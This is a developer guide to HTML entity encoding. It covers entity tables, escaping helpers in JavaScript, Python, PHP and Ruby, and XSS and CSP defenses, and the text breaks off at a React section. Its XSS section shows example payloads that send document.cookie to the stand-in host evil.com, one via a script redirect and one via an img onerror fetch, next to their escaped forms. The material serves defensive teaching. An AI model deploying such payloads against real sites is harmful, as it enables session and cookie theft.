HTML Entity Encoder Online: The Complete Guide to HTML Special Characters

TL;DR

HTML entities convert special characters (like &, <, >, ") into browser-safe representations. Always encode & as &amp; and < as &lt; in HTML. Use named entities for readability and numeric entities for any Unicode character. Proper encoding is the primary defense against XSS attacks. Modern UTF-8 pages can embed most characters directly, but the five HTML-special characters still require encoding. Try our free HTML Entity Encoder/Decoder →

Key Takeaways

Always encode &, <, >, ", and ' when inserting user data into HTML.
Named entities (&copy;) are readable; numeric entities (&#169; or &#xA9;) work for any Unicode character.
HTML entity encoding is different from URL percent-encoding — they serve different contexts.
Server-side frameworks auto-escape HTML in templates, but raw innerHTML assignments in JavaScript do not.
XSS attacks exploit unencoded HTML insertion; entity-encoding user input neutralizes them.
Modern UTF-8 documents can use accented letters and emoji directly; only the 5 HTML-special characters need encoding.
&nbsp; (non-breaking space) should be used to prevent unwanted line breaks, not for visual spacing.

What Are HTML Entities?

An HTML entity is a special text sequence used in HTML documents to represent characters that either have a reserved meaning in HTML syntax or cannot be typed directly on a standard keyboard. Every entity begins with an ampersand (&) and ends with a semicolon (;).

HTML entities were introduced because early HTML documents were, in practice, limited to ASCII or a single-byte encoding such as ISO-8859-1, yet authors needed a way to include accented letters, currency signs, mathematical symbols, and special punctuation. Today, HTML5 documents nearly universally declare UTF-8 encoding, which means most characters can be embedded directly. However, the five characters with special HTML significance must still be encoded as entities wherever they would otherwise be read as markup:

Character	Entity	Name
&	&amp;	Ampersand
<	&lt;	Less-than
>	&gt;	Greater-than
"	&quot;	Double quote
'	&apos;	Apostrophe

There are two types of HTML entities:

Named entities: use a descriptive name enclosed in & and ;. Example: &copy; renders as ©. Only predefined characters have named entities.
Numeric entities: use the Unicode code point in decimal (&#169;) or hexadecimal (&#xA9;) form. These work for every Unicode character.
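As a quick check that the forms are interchangeable, the sketch below decodes a named, a decimal, and a hexadecimal reference for the same character. It uses Python's standard `html` module purely for illustration; the variable names are not from the original article.

```python
import html

# Three spellings of the copyright sign: named, decimal, hexadecimal.
references = ["&copy;", "&#169;", "&#xA9;"]

# html.unescape() resolves named and numeric character references.
decoded = [html.unescape(ref) for ref in references]

# Every reference decodes to the same single character, U+00A9.
all_same = all(ch == "\u00a9" for ch in decoded)
print(decoded, all_same)
```

Which form to write is therefore a readability choice, not a rendering one.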

Encode or decode HTML entities instantly with our free online tool →

Essential HTML Entities Reference Table

The table below covers the most important HTML entities across several categories: security-critical characters, typography, currency, math, Greek letters, arrows, and accented Latin characters. All modern browsers support these entities.

Character	Named Entity	Numeric Entity	Description / Use Case
&	&amp;	&#38;	Ampersand: must always be encoded in HTML
<	&lt;	&#60;	Less-than sign: opens an HTML tag
>	&gt;	&#62;	Greater-than sign: closes an HTML tag
"	&quot;	&#34;	Double quote: required in attribute values
'	&apos;	&#39;	Single quote / apostrophe: use in attribute values
/	&sol;	&#47;	Solidus (forward slash)
`	&grave;	&#96;	Backtick / grave accent
(non-break)	&nbsp;	&#160;	Non-breaking space: prevents line wrap
©	&copy;	&#169;	Copyright symbol
®	&reg;	&#174;	Registered trademark symbol
™	&trade;	&#8482;	Trademark (unregistered)
€	&euro;	&#8364;	Euro currency sign
£	&pound;	&#163;	Pound sterling
¥	&yen;	&#165;	Japanese yen
¢	&cent;	&#162;	Cent sign
–	&ndash;	&#8211;	En dash: used for ranges (2010–2020)
—	&mdash;	&#8212;	Em dash: used as a sentence break
‘	&lsquo;	&#8216;	Left single quotation mark
’	&rsquo;	&#8217;	Right single quotation mark (also apostrophe)
“	&ldquo;	&#8220;	Left double quotation mark
”	&rdquo;	&#8221;	Right double quotation mark
…	&hellip;	&#8230;	Horizontal ellipsis (three dots)
·	&middot;	&#183;	Middle dot / interpunct
°	&deg;	&#176;	Degree sign
±	&plusmn;	&#177;	Plus-minus sign
×	&times;	&#215;	Multiplication sign
÷	&divide;	&#247;	Division sign
≠	&ne;	&#8800;	Not equal to
≤	&le;	&#8804;	Less-than or equal to
≥	&ge;	&#8805;	Greater-than or equal to
∞	&infin;	&#8734;	Infinity symbol
∅	&empty;	&#8709;	Empty set
α	&alpha;	&#945;	Greek letter alpha
β	&beta;	&#946;	Greek letter beta
γ	&gamma;	&#947;	Greek letter gamma
π	&pi;	&#960;	Greek letter pi
σ	&sigma;	&#963;	Greek letter sigma
Ω	&Omega;	&#937;	Greek capital letter omega
→	&rarr;	&#8594;	Rightwards arrow
←	&larr;	&#8592;	Leftwards arrow
↑	&uarr;	&#8593;	Upwards arrow
↓	&darr;	&#8595;	Downwards arrow
♥	&hearts;	&#9829;	Black heart suit
♠	&spades;	&#9824;	Black spade suit
♦	&diams;	&#9830;	Black diamond suit
♣	&clubs;	&#9827;	Black club suit
é	&eacute;	&#233;	Latin small e with acute
à	&agrave;	&#224;	Latin small a with grave
ü	&uuml;	&#252;	Latin small u with diaeresis
ñ	&ntilde;	&#241;	Latin small n with tilde (Spanish)
ç	&ccedil;	&#231;	Latin small c with cedilla

Named Entities vs Numeric Entities

HTML entities come in two syntactic forms, each with distinct trade-offs. Understanding when to use each form is key to writing maintainable, portable HTML.

Named Entities

Named entities use human-readable mnemonic names. The HTML5 specification defines over 2,000 named character references. Names are case-sensitive: &eacute; is é while &Eacute; is É, and &lt; is < while &Lt; is ≪. A few legacy names, such as &LT; and &AMP;, are also defined in uppercase as aliases, but most names exist in only one casing.

<!-- Named entities — readable and self-documenting -->
<p>Copyright &copy; 2025 DevToolBox &mdash; All rights reserved.</p>
<p>Price: &pound;49.99 or &euro;59.99</p>
<p>Evaluate: x &le; y &ne; z</p>
<p>Reaction: I &hearts; JavaScript</p>

Named entities are the best choice when: the entity is frequently used and recognizable, you want your HTML source to be readable without constant reference to code charts, and you are targeting modern browsers (all of them support the HTML5 named character references).
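To see how casing changes which character a name refers to, one option is to look names up in the `html5` table that ships with Python's standard library. This is only an illustrative sketch; the variable names are made up for the example.

```python
from html.entities import html5

# html5 maps reference names (without the leading "&") to their characters.
lower_e = html5["eacute;"]   # small e with acute
upper_e = html5["Eacute;"]   # capital E with acute
lt_lower = html5["lt;"]      # the less-than sign
lt_mixed = html5["Lt;"]      # a different character: U+226A, "much less-than"

print(lower_e, upper_e, lt_lower, lt_mixed)
```

A mistyped capital letter can therefore silently produce a different symbol rather than an error.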

Numeric Entities — Decimal

Decimal numeric entities use the Unicode code point in base 10. Format: &#[decimal];. They work for any Unicode character, even those without named entities.

<!-- Decimal numeric entities -->
<p>Copyright &#169; 2025</p>          <!-- same as &copy; -->
<p>Trademark &#8482;</p>               <!-- &trade; -->
<p>Snowman: &#9731;</p>                <!-- no named entity! -->
<p>Musical note: &#9835;</p>           <!-- no named entity! -->
<p>Emoji-like: &#128512;</p>           <!-- U+1F600 grinning face -->

Numeric Entities — Hexadecimal

Hexadecimal numeric entities use the code point in base 16. Format: &#x[hex];. Developers who work with Unicode charts often prefer hex because Unicode values are typically specified in hex (U+00A9, U+20AC, etc.).

<!-- Hexadecimal numeric entities — map directly to Unicode code points -->
<p>Copyright &#xA9; 2025</p>           <!-- U+00A9 -->
<p>Euro sign: &#x20AC;</p>             <!-- U+20AC -->
<p>Em dash &#x2014; separates ideas</p> <!-- U+2014 -->
<p>Right arrow: &#x2192;</p>           <!-- U+2192 -->
<p>Snowflake: &#x2746;</p>             <!-- U+2746 -->

Tip: In modern UTF-8 HTML5 documents, you can use Unicode characters directly without entities (e.g., type the © character itself instead of &copy;). Entities are still required for the 5 HTML-special characters and are useful when your text editor cannot handle certain character sets or when generating HTML programmatically.
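Both numeric forms are derived from the same code point, which a few lines of Python can make concrete. The helper name `numeric_entities` is hypothetical and exists only for this sketch.

```python
def numeric_entities(char: str) -> tuple[str, str]:
    """Return the decimal and hexadecimal references for one character."""
    code_point = ord(char)  # Unicode code point as an integer
    return f"&#{code_point};", f"&#x{code_point:X};"

print(numeric_entities("©"))   # ('&#169;', '&#xA9;')
print(numeric_entities("€"))   # ('&#8364;', '&#x20AC;')
print(numeric_entities("😀"))  # ('&#128512;', '&#x1F600;')
```

The hexadecimal form matches the digits in the usual U+XXXX notation, which is why it is convenient when working from Unicode charts.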

When to Encode vs When Not To

Knowing exactly when HTML entity encoding is mandatory, when it is recommended, and when it is unnecessary helps you write secure, correct HTML without over-encoding.

Always Encode (Required)

These characters must be encoded in the contexts listed:

& → &amp; (in text content AND in attribute values)
< → &lt; (in text content; it opens a tag otherwise)
> → &gt; (in text content; recommended in HTML, and required in XML when it follows ]])
" → &quot; (when the attribute value is delimited by double quotes)
' → &#39; or &apos; (when the attribute value is delimited by single quotes)

<!-- WRONG: unencoded ampersand breaks HTML parsing -->
<a href="https://example.com?foo=1&bar=2">Link</a>

<!-- CORRECT: encode the ampersand -->
<a href="https://example.com?foo=1&amp;bar=2">Link</a>

<!-- WRONG: unencoded < in text creates a broken tag -->
<p>if a < b then c > d</p>

<!-- CORRECT: encode angle brackets -->
<p>if a &lt; b then c &gt; d</p>

<!-- WRONG: unescaped quote terminates attribute early -->
<input value="Say "hello" to me">

<!-- CORRECT: encode the inner double quotes -->
<input value="Say &quot;hello&quot; to me">

<!-- ALTERNATIVE: use single quotes for the attribute -->
<input value='Say "hello" to me'>

Encode When Generating HTML Dynamically

Any time user-supplied text, database content, or external data is inserted into an HTML document — whether via server-side templates or client-side DOM manipulation — special characters must be entity-encoded before insertion. This is the primary XSS prevention mechanism.

<!-- If userInput = '<script>alert(1)</script>' -->

<!-- DANGEROUS — raw innerHTML injection -->
<div id="output"></div>
<script>
  document.getElementById('output').innerHTML = userInput; // XSS!
</script>

<!-- SAFE — use textContent which does NOT parse HTML -->
<script>
  document.getElementById('output').textContent = userInput; // safe
</script>

<!-- SAFE — encode before inserting as innerHTML -->
<script>
  function encodeHtml(str) {
    return str
      .replace(/&/g, '&amp;')
      .replace(/</g, '&lt;')
      .replace(/>/g, '&gt;')
      .replace(/"/g, '&quot;')
      .replace(/'/g, '&#39;');
  }
  document.getElementById('output').innerHTML = encodeHtml(userInput);
</script>

When Encoding Is Optional (UTF-8 Documents)

In modern HTML5 documents with <meta charset="UTF-8">, you can embed accented letters, currency signs, emoji, and most Unicode characters directly in your source. Using &eacute; for é or &euro; for € is optional: the literal characters are equally valid. Encoding everything is unnecessary noise.

<!-- HTML5 UTF-8 document — these are equivalent -->
<p>Caf&eacute; au lait costs &euro;3.50</p>
<p>Café au lait costs €3.50</p>

<!-- Both render identically in all modern browsers -->
<!-- The second form is preferred in UTF-8 source files -->

Context-Specific Encoding Rules

HTML Context	Characters to Encode	Example
Text content (between tags)	& < >	<p>Tom &amp; Jerry &lt;3</p>
Double-quoted attribute	& < " (> optional)	<a href="x?a=1&amp;b=2">
Single-quoted attribute	& < ' (> optional)	<img alt='Tom &amp; Jerry'>
Unquoted attribute	& < > " ' space tab	(avoid unquoted attributes)
style attribute (CSS in HTML)	& < " in CSS strings	<div style="content: &quot;x&quot;">
JavaScript string in event handler	& < > " '	<div onclick="fn(&quot;x&quot;)">
URL in href/src	Percent-encode URL; then entity-encode & in HTML	<a href="/?q=a%20b&amp;page=1">
CDATA sections	]]> must be avoided	(XML/XHTML specific)
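The first rows of the table can be sketched as two small helpers, one for text content and one for quoted attribute values. This is a minimal illustration using Python's standard `html.escape`; the helper names `escape_text` and `escape_attr` are assumptions made for the example, not part of any library.

```python
import html

def escape_text(value: str) -> str:
    # Text content: & < > are escaped; quotes may stay literal.
    return html.escape(value, quote=False)

def escape_attr(value: str) -> str:
    # Quoted attribute value: additionally escape " and '.
    return html.escape(value, quote=True)

name = 'Tom & "Jerry" <3'
paragraph = f"<p>{escape_text(name)}</p>"
image = f'<img alt="{escape_attr(name)}">'

print(paragraph)  # <p>Tom &amp; "Jerry" &lt;3</p>
print(image)      # <img alt="Tom &amp; &quot;Jerry&quot; &lt;3">
```

Using the attribute-safe variant everywhere is a reasonable default, since over-escaping quotes in text content is harmless.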

HTML Entity Encoding vs URL Encoding

Developers often confuse HTML entity encoding and URL percent-encoding because both deal with special characters and often appear together. They are fundamentally different mechanisms for different purposes:

Property	HTML Entity Encoding	URL Percent Encoding
Format	&name; or &#code;	%XX (hex byte)
Context	HTML documents and templates	URLs, query strings, form data
Standard	HTML5 Named Character References	RFC 3986
Example: space	&#32; or &nbsp;	%20 or + (in form data)
Example: &	&amp;	%26
Example: <	&lt;	%3C
Example: ©	&copy; or &#169;	%C2%A9 (UTF-8 bytes)
Example: €	&euro; or &#8364;	%E2%82%AC (UTF-8 bytes)

A common scenario requires both types of encoding. When embedding a URL in an HTML attribute, the URL itself may contain percent-encoded characters, and the HTML attribute may also require HTML entity encoding of the ampersand in query strings:

<!-- URL with query parameters in an HTML attribute -->
<!-- Step 1: URL encode the query values -->
<!-- "hello world" -> "hello%20world" -->
<!-- Step 2: HTML entity encode the & separating parameters -->

<!-- WRONG — bare & breaks HTML validation -->
<a href="https://example.com/search?q=hello%20world&lang=en">Search</a>

<!-- CORRECT — & in HTML attribute must be &amp; -->
<a href="https://example.com/search?q=hello%20world&amp;lang=en">Search</a>

<!-- Note: URL path characters ARE percent-encoded; HTML attribute & IS entity-encoded -->
<!-- They are two separate encoding layers applied in their respective contexts -->
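The same two layers can be applied programmatically. The following sketch uses only Python's standard library: `urllib.parse.urlencode` handles the percent-encoding, and `html.escape` handles the attribute. The URL and parameter names simply mirror the example above.

```python
import html
from urllib.parse import quote, urlencode

params = {"q": "hello world", "lang": "en"}

# Layer 1: percent-encode the query values (quote_via=quote yields %20 rather than +).
query = urlencode(params, quote_via=quote)
url = f"https://example.com/search?{query}"

# Layer 2: entity-encode the finished URL for use inside an HTML attribute.
link = f'<a href="{html.escape(url, quote=True)}">Search</a>'

print(url)   # https://example.com/search?q=hello%20world&lang=en
print(link)  # <a href="https://example.com/search?q=hello%20world&amp;lang=en">Search</a>
```

The order matters: percent-encode first, then entity-encode the result, so that the browser's HTML parser undoes the outer layer and hands the URL parser an intact query string.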

Use our URL Encoder tool for percent-encoding and our HTML Entity Encoder tool for HTML entity encoding — they address different encoding needs.

HTML Entity Encoding in JavaScript

JavaScript does not have a built-in HTML escape function, but there are several correct and idiomatic approaches. Choosing the right API matters for both security and correctness.

The Correct Way: textContent and DOM APIs

The safest and most straightforward method is to use the DOM APIs that automatically handle encoding for you:

// --- Safe: textContent sets plain text, no HTML parsing ---
const div = document.createElement('div');
div.textContent = '<script>alert("xss")</script>';
console.log(div.innerHTML);
// Output: &lt;script&gt;alert("xss")&lt;/script&gt;

// --- Safe: createTextNode for dynamic content ---
const textNode = document.createTextNode('Tom & Jerry <3');
document.body.appendChild(textNode);
// Renders as: Tom & Jerry <3  (no HTML interpretation)

// --- Safe: setAttribute for setting attribute values ---
const a = document.createElement('a');
a.setAttribute('title', 'Tom & Jerry <fansite>');
// Attribute is set correctly; browser handles the encoding internally

Manual Encoding Function (When innerHTML Is Required)

When you need to construct HTML strings (e.g., to set innerHTML with mixed text and markup), create a reliable encode function:

/**
 * Encode HTML special characters to prevent XSS.
 * Only encodes the 5 characters that have HTML significance.
 */
function encodeHtml(str: string): string {
  return String(str)
    .replace(/&/g, '&amp;')    // Must be FIRST — otherwise &lt; becomes &amp;lt;
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');   // Use &#39; for broader compatibility than &apos;
}

/**
 * Decode HTML entities back to plain text.
 */
function decodeHtml(html: string): string {
  const txt = document.createElement('textarea');
  txt.innerHTML = html;
  return txt.value;
}

// Usage examples:
encodeHtml('<script>alert("xss")</script>');
// => '&lt;script&gt;alert(&quot;xss&quot;)&lt;/script&gt;'

encodeHtml("Tom & Jerry's adventure");
// => 'Tom &amp; Jerry&#39;s adventure'

decodeHtml('&lt;strong&gt;Hello &amp; World&lt;/strong&gt;');
// => '<strong>Hello & World</strong>'

Using DOMParser for Safe HTML Parsing

// DOMParser: parse HTML safely and extract text
function htmlToText(html: string): string {
  const doc = new DOMParser().parseFromString(html, 'text/html');
  return doc.body.textContent ?? '';
}

htmlToText('<b>Hello</b> &amp; <i>World</i>');
// => 'Hello & World'

// Alternative with template literals and tagged templates
function safeHtml(strings: TemplateStringsArray, ...values: unknown[]): string {
  return strings.reduce((result, str, i) => {
    const value = values[i - 1];
    return result + encodeHtml(String(value ?? '')) + str;
  });
}

const username = '<script>alert(1)</script>';
const greeting = safeHtml`<p>Welcome, ${username}!</p>`;
// => '<p>Welcome, &lt;script&gt;alert(1)&lt;/script&gt;!</p>'

Libraries for HTML Encoding in JavaScript

Library	Function	Notes
he	he.encode() / he.decode()	Full HTML entity encoder/decoder — supports all named + numeric entities
entities	encodeHTML() / decodeHTML()	Lightweight; supports HTML4, HTML5, and XML entities
DOMPurify	DOMPurify.sanitize()	Full XSS sanitizer — strips dangerous tags/attributes, not just encoding
escape-html	escapeHtml(str)	Minimal 5-character encoder for security — no decoding
xss	xss(str)	Configurable whitelist-based XSS filter

// Using the 'he' library (npm install he)
import he from 'he';

he.escape('Tom & Jerry <fansite>');
// => 'Tom &amp; Jerry &lt;fansite&gt;'
// (he.encode() without options emits hexadecimal references such as &#x26; instead)

he.encode('Café ©', { useNamedReferences: true });
// => 'Caf&eacute; &copy;'

he.decode('&lt;p&gt;Hello &amp; World&lt;/p&gt;');
// => '<p>Hello & World</p>'

// Using 'escape-html' (minimal, security-focused)
import escapeHtml from 'escape-html';
escapeHtml('<script>alert(1)</script>');
// => '&lt;script&gt;alert(1)&lt;/script&gt;'

HTML Entity Encoding in Python

Python ships with robust HTML encoding utilities in its standard library, making third-party dependencies unnecessary for basic use cases.

html.escape() and html.unescape()

import html

# html.escape() — encodes the 5 HTML-special characters
html.escape('<script>alert("xss")</script>')
# => '&lt;script&gt;alert(&quot;xss&quot;)&lt;/script&gt;'

html.escape('Tom & Jerry')
# => 'Tom &amp; Jerry'

# By default, quotes ARE encoded (quote=True is the default)
html.escape('"Hello World"')
# => '&quot;Hello World&quot;'

# Set quote=False to skip quote encoding (only safe for text content, not attributes!)
html.escape('"Hello"', quote=False)
# => '"Hello"'

# html.unescape() — decodes named and numeric entities
html.unescape('&lt;p&gt;Hello &amp; World&lt;/p&gt;')
# => '<p>Hello & World</p>'

html.unescape('Caf&eacute; &copy; 2025 &mdash; All rights reserved.')
# => 'Café © 2025 — All rights reserved.'

html.unescape('&#169; &#x20AC; &#9829;')
# => '© € ♥'

Python HTML Entity Encoding in Web Frameworks

# Django templates auto-escape by default
# {{ variable }} is HTML-escaped automatically
# Use {{ variable|safe }} only when you trust the content completely

from django.utils.html import escape, format_html
from django.utils.safestring import mark_safe  # only for content you fully trust

user_input = '<script>alert(1)</script>'
safe_html = escape(user_input)
# => '&lt;script&gt;alert(1)&lt;/script&gt;'

# format_html safely combines trusted HTML and escaped values
message = format_html('<p>Welcome, {}!</p>', user_input)
# => '<p>Welcome, &lt;script&gt;alert(1)&lt;/script&gt;!</p>'

# Flask/Jinja2 — auto-escapes in templates by default
from markupsafe import escape as jinja_escape, Markup

safe = jinja_escape('<b>Unsafe user input</b>')
print(safe)        # => &lt;b&gt;Unsafe user input&lt;/b&gt;
print(type(safe))  # => <class 'markupsafe.Markup'>

# Build safe HTML from trusted + untrusted parts
trusted_html = Markup('<p>Hello, {}!</p>').format('<script>xss</script>')
# => '<p>Hello, &lt;script&gt;xss&lt;/script&gt;!</p>'

Encoding All Named Entities in Python

# For full named entity encoding (e.g., © -> &copy;), use html.entities
import html
from html.entities import codepoint2name

def encode_full_html(text: str, named: bool = True) -> str:
    """Encode all non-ASCII chars as named or numeric HTML entities."""
    result = []
    for char in html.escape(text):
        code = ord(char)
        if code > 127:
            name = codepoint2name.get(code)
            if named and name:
                result.append(f'&{name};')
            else:
                result.append(f'&#{code};')
        else:
            result.append(char)
    return ''.join(result)

encode_full_html('Café © 2025 — Cost: €49')
# => 'Caf&eacute; &copy; 2025 &mdash; Cost: &euro;49'

encode_full_html('Café © 2025', named=False)
# => 'Caf&#233; &#169; 2025'

HTML Entity Encoding in PHP

PHP provides two main functions for HTML encoding, each with important differences that affect security and character coverage.

htmlspecialchars() vs htmlentities()

<?php

// htmlspecialchars() — encodes only the 5 HTML-special characters
// This is the RECOMMENDED function for XSS prevention
$user_input = '<script>alert("XSS")</script>';
echo htmlspecialchars($user_input, ENT_QUOTES | ENT_HTML5, 'UTF-8');
// => &lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;

// Always pass ENT_QUOTES to encode both single and double quotes
// (before PHP 8.1 the default flags left single quotes unencoded).
// The default encoding has been UTF-8 since PHP 5.4; passing 'UTF-8' explicitly keeps the intent clear.

// htmlentities() — encodes ALL characters with HTML entity equivalents
// More aggressive than needed for UTF-8 documents; can cause issues
$text = 'Café © 2025 costs €49';
echo htmlentities($text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
// => Caf&eacute; &copy; 2025 costs &euro;49

// htmlspecialchars_decode() — decodes back the 5 special chars only
$encoded = '&lt;b&gt;Hello &amp; World&lt;/b&gt;';
echo htmlspecialchars_decode($encoded, ENT_QUOTES);
// => <b>Hello & World</b>

// html_entity_decode() — decodes ALL HTML entities
$encoded = 'Caf&eacute; &copy; &euro;49';
echo html_entity_decode($encoded, ENT_QUOTES | ENT_HTML5, 'UTF-8');
// => Café © €49

// strip_tags(): removes HTML tags (NOT a security substitute for encoding!)
$input = '<script>alert(1)</script><b>Bold</b>';
echo strip_tags($input);
// => alert(1)Bold  (only the tags are removed; the script's text remains. NEVER rely on this for security)

?>

PHP Best Practices for HTML Encoding

PHP Security Rule: Always use htmlspecialchars($var, ENT_QUOTES | ENT_HTML5, 'UTF-8') when outputting user data in HTML. Do not rely on strip_tags() alone — it does not prevent XSS in attribute values or event handlers.

<?php
// Create a reusable helper function
function h(string $str): string {
    return htmlspecialchars($str, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Usage in HTML templates
?>
<div class="user-profile">
    <h1><?= h($user['name']) ?></h1>
    <p class="bio"><?= h($user['bio']) ?></p>
    <a href="<?= h($user['website']) ?>">
        <?= h($user['website_label']) ?>
    </a>
    <input type="text" value="<?= h($user['email']) ?>"
           placeholder="<?= h($placeholder) ?>">
</div>

<?php
// In Twig templates (Symfony, Craft CMS)
// {{ variable }} — auto-escaped in Twig (same as h())
// {{ variable|raw }} — UNSAFE, skips escaping
// {{ variable|e('html') }} — explicit HTML escaping

// In Blade templates (Laravel)
// {{ $variable }} — auto-escaped
// {!! $variable !!} — UNSAFE raw output
?>

HTML Entity Encoding in Ruby

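Ruby on Rails and the standard library's CGI and ERB modules provide standard tools for HTML encoding. Rails renders ERB templates with the Erubi engine and escapes output by default; other Rack-based frameworks do not necessarily do so, so check how your template engine is configured.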

# Ruby standard library: CGI module
require 'cgi'

CGI.escapeHTML('<script>alert("xss")</script>')
# => "&lt;script&gt;alert(&quot;xss&quot;)&lt;/script&gt;"

CGI.escapeHTML('Tom & Jerry')
# => "Tom &amp; Jerry"

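CGI.unescapeHTML('&lt;b&gt;Hello&lt;/b&gt; &amp; World &#169;')
# => "<b>Hello</b> & World ©"
# (CGI.unescapeHTML decodes the five basic entities and numeric references;
#  other named entities such as &copy; are left unchanged)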

# Ruby on Rails — ERB templates
# <%= variable %> — HTML-escaped automatically (calls html_escape / h)
# <%== variable %> or <%= raw variable %> — UNSAFE raw output

# Using ERB programmatically
require 'erb'
include ERB::Util

html_escape('<script>alert(1)</script>')
# => "&lt;script&gt;alert(1)&lt;/script&gt;"

h('<script>alert(1)</script>')   # h() is an alias for html_escape
# => "&lt;script&gt;alert(1)&lt;/script&gt;"

# ActiveSupport (Rails) — content_tag for safe HTML generation
# content_tag(:p, user.name)           # auto-escaped
# content_tag(:p, user.name.html_safe) # UNSAFE — use only for trusted content

# Rack::Utils
require 'rack/utils'
Rack::Utils.escape_html('Tom & Jerry <3')
# => "Tom &amp; Jerry &lt;3"

XSS Prevention with HTML Entity Encoding

Cross-Site Scripting (XSS) is one of the most prevalent web security vulnerabilities. It occurs when an attacker injects malicious scripts into web pages viewed by other users. HTML entity encoding is the primary defense, but it must be applied correctly and in the right context.

Understanding XSS Attack Vectors

XSS Attack Types:

Reflected XSS: Malicious script in the URL is reflected back in the response.
Stored XSS: Malicious script stored in the database, served to all visitors.
DOM-based XSS: Script injected via client-side DOM manipulation without server involvement.

<!-- Reflected XSS Example -->
<!-- URL: https://example.com/search?q=<script>document.location='https://evil.com?c='+document.cookie</script> -->

<!-- VULNERABLE server response -->
<p>Results for: <script>document.location='https://evil.com?c='+document.cookie</script></p>

<!-- SAFE server response (after HTML encoding the query parameter) -->
<p>Results for: &lt;script&gt;document.location=&#39;https://evil.com?c=&#39;+document.cookie&lt;/script&gt;</p>

<!-- Stored XSS Example — comment stored in database -->
<!-- Attacker comment: <img src=x onerror="fetch('https://evil.com?'+document.cookie)"> -->

<!-- VULNERABLE — displaying raw stored content -->
<div class="comment">[raw comment HTML here]</div>

<!-- SAFE — HTML-encode before rendering -->
<div class="comment">&lt;img src=x onerror=&quot;fetch(&#39;https://evil.com?&#39;+document.cookie)&quot;&gt;</div>
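The reflected case above can be reproduced in a few lines. This is a minimal sketch of a server-side render step using Python's standard `html.escape`; the function name `render_results` is hypothetical, and a real application would normally rely on its template engine's auto-escaping instead.

```python
import html

def render_results(query: str) -> str:
    # Escape the untrusted query before placing it in the page.
    return f"<p>Results for: {html.escape(query)}</p>"

payload = "<script>document.location='https://evil.com?c='+document.cookie</script>"
page = render_results(payload)

# The response contains no script element; the payload survives only as text.
print(page)
```

Decoding the escaped text gives back the original payload, which shows that nothing was lost: the characters were only made inert for the HTML parser.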

Context-Sensitive Escaping — Why One Encoder Is Not Enough

A critical and often misunderstood principle: HTML entity encoding alone is not sufficient for all injection contexts. Different parts of an HTML document require different escaping strategies:

Context	Required Escaping	Example
HTML body text	HTML entity encode	<p>{user_input}</p>
HTML attribute value	HTML entity encode + quote attribute	<input value="{user_input}">
JavaScript string in script tag	JavaScript string escape (\\, \", \n, etc.)	<script>var x = "{user_input}";</script>
CSS value in style tag	CSS escape	<style>color: {user_input};</style>
URL in href/src	URL encode, then HTML encode	<a href="{url_encoded_then_html_encoded}">
JSON in HTML	JSON encode + avoid </script>	<script>var data = {json_encoded};</script>

// JavaScript context inside <script> tags requires JS string escaping, NOT HTML entities
// WRONG: HTML encoding in a JS context
const name = '&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;';
// Inside a <script> element the browser does not decode entities, so the variable holds
// the literal text "&lt;/script&gt;..." (corrupted data). HTML encoding also leaves
// backslashes and line breaks untouched, so a crafted value can still break the string.
// (In an event-handler attribute the opposite applies: entities are decoded before the JS runs.)

// CORRECT: JSON encode for JavaScript embedding
// In a server template (e.g., Node.js with Handlebars):
const userData = JSON.stringify({ name: userName })
  .replace(/</g, '\\u003c');  // escape every "<" so "</script>" cannot close the element early

// Better: use a dedicated JSON-in-HTML serializer
// e.g., serialize-javascript (npm package)
import serialize from 'serialize-javascript';
const userDataStr = serialize({ name: userName }, { isJSON: true });

// CSS injection is also real — never embed user input in CSS without escaping
// WRONG:
// <div style="background-image: url({userUrl});">
// An attacker can use: ); expression(alert(1)); background:(

// SAFE: Never allow user input in CSS values; use whitelisting or data attributes instead
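For the JSON-in-HTML row, one commonly used approach is to JSON-encode the data and then replace the characters that matter to the HTML parser with `\uXXXX` escapes, which JSON and JavaScript both read back as the original characters. The sketch below assumes a Python backend; `json_for_script` is a hypothetical helper name.

```python
import json

def json_for_script(data: object) -> str:
    """Serialize data as JSON that is safe to place inside a <script> element."""
    text = json.dumps(data)
    # Replace HTML-significant characters with JSON unicode escapes so that
    # sequences such as "</script>" or "<!--" never appear in the output.
    return (text.replace("<", "\\u003c")
                .replace(">", "\\u003e")
                .replace("&", "\\u0026"))

user_name = "</script><script>alert(1)</script>"
embedded = json_for_script({"name": user_name})

print(embedded)
```

Because the escapes are valid JSON, parsing the embedded string yields the original value unchanged.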

Content Security Policy as Defense in Depth

HTML encoding neutralizes most XSS, but a Content Security Policy (CSP) header provides a second layer of defense that limits what scripts can execute even if encoding fails:

# HTTP Response Header — strict CSP
Content-Security-Policy: default-src 'self';
  script-src 'self' 'nonce-{random-nonce-per-request}';
  style-src 'self' 'nonce-{random-nonce-per-request}';
  img-src 'self' data: https:;
  font-src 'self';
  object-src 'none';
  base-uri 'self';
  form-action 'self';
  frame-ancestors 'none';

# With nonces, only scripts with the matching nonce attribute execute:
<script nonce="rAnd0mNonce123">
  // This script is allowed by CSP
</script>

# Any injected <script> without the nonce is blocked by the browser
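Generating the per-request nonce is the part that is easy to get wrong, so here is a hedged sketch using Python's standard `secrets` module. The function names and the shortened policy string are assumptions for illustration; a real deployment would set the header through its web framework.

```python
import secrets

def new_nonce() -> str:
    # 16 random bytes from a cryptographically secure source, URL-safe base64 text.
    return secrets.token_urlsafe(16)

def csp_header(nonce: str) -> str:
    # A shortened policy; extend it with the directives your site needs.
    return (
        "default-src 'self'; "
        f"script-src 'self' 'nonce-{nonce}'; "
        "object-src 'none'; base-uri 'self'"
    )

nonce = new_nonce()                      # generate once per response
header = csp_header(nonce)               # value for Content-Security-Policy
script_tag = f'<script nonce="{nonce}">/* allowed by CSP */</script>'

print(header)
print(script_tag)
```

The nonce must be unpredictable and must change on every response; reusing a fixed value would let an attacker copy it into injected markup.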

Defense-in-depth approach:

HTML entity encode all user-supplied data in HTML contexts (primary defense).
Use context-appropriate escaping (JS, CSS, URL) in other contexts.
Implement Content Security Policy headers (secondary defense).
Use HTTP-only cookies to limit cookie theft even if XSS occurs.
Use a well-tested sanitization library (like DOMPurify) for rich text user input.

HTML Entities in React / JSX

React automatically HTML-encodes all string values rendered via JSX expressions. This means you rarely need to manually encode entities in React applications. However, there are specific patterns for using HTML entities in JSX.

React Auto-Escaping

// React auto-escapes all JSX expressions
const userInput = '<script>alert("xss")</script>';
